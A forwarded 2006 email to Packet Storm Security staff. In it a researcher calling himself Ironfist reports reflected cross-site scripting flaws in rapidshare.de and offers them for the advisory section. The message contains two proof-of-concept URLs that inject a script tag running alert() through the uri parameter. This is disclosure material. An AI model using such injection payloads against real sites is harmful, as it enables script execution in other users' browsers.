----- Forwarded message from "Giel S." <ironfist99@gmail.com> -----

Delivered-To: todd@packetstormsecurity.org
Delivered-To: staff@packetstormsecurity.org
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=JHl38kCdNMoslfO76tAst/ztrFUtJ53rA6GRz4tCixBwF9f1Ae9++DujXYcx//nxItaEttUde73I6u12t2gn8kLSca2Vn8igQd+RzNhuOwJXybBpadlL0tiEbWReQosXQu6qGLboY2QPOYRyJLDOj3I91V2Q5WVE00WHDGZwyLI=
Date: Mon, 13 Mar 2006 19:13:11 +0100
From: "Giel S." <ironfist99@gmail.com>
To: staff@packetstormsecurity.org
Subject: Rapidshare XSS
X-Spam-Checker-Version: SpamAssassin 2.63 (2004-01-11) on 
	www.packetstormsecurity.org
X-Spam-Level: 
X-Spam-Status: No, hits=-3.8 required=5.0 tests=BAYES_00,FROM_ENDS_IN_NUMS,
	HTML_MESSAGE autolearn=no version=2.63

Hi,

I've discovered a (new) Rapidshare.de cross site scripting attack:
http://rapidshare.de/?uri=/files/11707529%2%3Cscript%3Ealert%28%22Another%20XSS%20in%20rapidshare%2C%20found%20by%20Ironfist%22%29%3B%3C/script%3E&dl.start=Free
http://rapidshare.de/?uri=%2Ffiles%2F15307201%2F%3Cscript%3Ealert(%22Premium%20zone%20also%20not%20secure%22);%3C/script%3E&dl.start=PREMIUM

Maybe an idea for the advisory section?

Greetings,

Ironfist

----- End forwarded message -----